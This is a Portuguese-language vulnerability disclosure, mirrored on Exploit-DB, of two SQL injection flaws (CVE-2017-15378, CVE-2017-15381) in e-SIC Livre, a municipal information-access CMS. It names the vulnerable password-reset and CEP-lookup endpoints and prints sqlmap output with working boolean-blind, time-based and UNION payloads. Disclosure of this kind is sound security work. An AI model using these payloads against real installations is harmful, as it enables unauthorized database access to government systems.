E-Sic Software livre CMS - Sql Injection

Sql Injection no parametro de redefinição de senha.

Postado por @elber333 - 10/10/2017 - FireShell Security team
fireshellsecurity.team - MAIL: admin@fireshellsecurity.team
Exploit-DB: https://www.exploit-db.com/exploits/42981/

Como ja fazem meses que estou tentando contactar o desenvolvedor e eles não me retornam nada, vamos lá.

TODOS OS TESTES FORAM REALIAZADOS EM UM AMBIENTE LOCAL ONDE O CMS FOI HOSPEDADO NA MINHA MÁQUINA.

Sobre o Software:

O e-SIC Livre é uma solução voltada para a gestão de atendimento ao público baseado em perguntas e respostas, e visa oferecer aos municípios um serviço de pleno acordo com a Lei de Acesso à Informação (LAI). Mais transparência e informação direta e clara do governo para com o cidadão. Desenvolvido em PHP/MySQL, é totalmente funcional na maioria dos servidores, e possui módulos como: cadastro de organizações e departamentos, requerimentos com protocolo automático, perguntas frequentes, etc..

Download: https://softwarepublico.gov.br/social/articles/0000/0482/esiclivre.rar

[CVE-2017-15378]

A vulnerabilidade:

    A vulnerabilidade está no parametro de redefinição de senhas do software, onde podemos enviar parametros sql e interagir diretamente com o banco de dados. "Informe seu CPF ou CNPJ para enviarmos nova senha:" Url: http://localhost/esic/reset/

Com o SqlMap podemos ter um melhor resultado.

[CVE-2017-15381]

Exploit-DB: https://www.exploit-db.com/exploits/42982/

Vulnerabilidade está no script de pesquisa de CEP

Url: http://localhost/esiclivre/restrito/inc/buscacep.php

Data:


 
Parameter: f (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: f=-1932' OR 5987=5987 AND 'dtev'='dtev
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: f=test' OR SLEEP(5) AND 'kucr'='kucr
 
    Type: UNION query
    Title: MySQL UNION query (random number) - 6 columns
    Payload: f=test' UNION ALL SELECT 3344,3344,
 
CONCAT(0x7162627a71, 0x54657946565941494562654c437570647a4f4e53616744546e526663454152424e71506e564d6853,0x71786a6a71),    3344,3344,3344#

Mais sobre e-sic:

E-Sic Software livre CMS - Autentication Bypass
E-Sic Software livre CMS - XSS